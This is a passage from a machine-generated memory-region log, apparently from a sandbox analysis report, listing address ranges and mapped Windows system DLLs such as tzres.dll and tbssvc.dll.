"c:\\windows\\system32\\tbssvc.dll") Region: id = 3982 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tbssvc.dll.mui" filename = "\\Windows\\System32\\en-US\\tbssvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tbssvc.dll.mui") Region: id = 3983 start_va = 0x120000 end_va = 0x12ffff monitored = 0 entry_point = 0x12a33c region_type = mapped_file name = "tbssvc.dll" filename = "\\Windows\\System32\\tbssvc.dll" (normalized: "c:\\windows\\system32\\tbssvc.dll") Region: id = 3984 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tbssvc.dll.mui" filename = "\\Windows\\System32\\en-US\\tbssvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tbssvc.dll.mui") Region: id = 3985 start_va = 0x7fef9910000 end_va = 0x7fef991afff monitored = 0 entry_point = 0x7fef99146ec region_type = mapped_file name = "perfos.dll" filename = "\\Windows\\System32\\perfos.dll" (normalized: "c:\\windows\\system32\\perfos.dll") Region: id = 3986 start_va = 0x13f0000 end_va = 0x14effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 3987 start_va = 0x14f0000 end_va = 0x15effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 3988 start_va = 0x15f0000 end_va = 0x16effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015f0000" filename = "" Region: id = 3989 start_va = 0x120000 end_va = 0x122fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 4019 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4020 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4021 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4022 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4023 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4024 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4025 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4026 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4027 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4028 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4029 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4030 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4031 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4032 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4033 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4034 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4035 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4036 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4037 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4038 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4039 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4040 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4041 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4042 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4043 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4044 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4045 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4046 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4047 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4048 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4049 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4050 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4051 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4052 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4053 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4054 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4055 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4056 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4057 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4058 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4059 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4060 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4061 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4062 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4063 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4064 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4065 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4066 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4067 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4068 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4069 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4070 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4071 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4072 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4073 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4074 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4075 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4076 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4077 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4078 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4079 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4080 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4081 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4082 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4083 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4084 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4085 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4086 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4087 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4088 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4089 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4090 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4091 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4092 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4093 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4094 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4095 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4096 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4097 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4098 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4099 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4100 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4101 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4102 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4103 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4104 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4105 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4106 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4107 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4108 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4109 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4110 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4111 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4112 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4113 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4114 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4115 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4116 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4117 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4118 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4119 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4120 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4121 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4122 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4123 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4124 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4125 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4126 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4127 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4128 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4129 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4130 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4131 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4132 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4133 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4134 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4135 start_va = 0x130000 end_va = 0x137fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 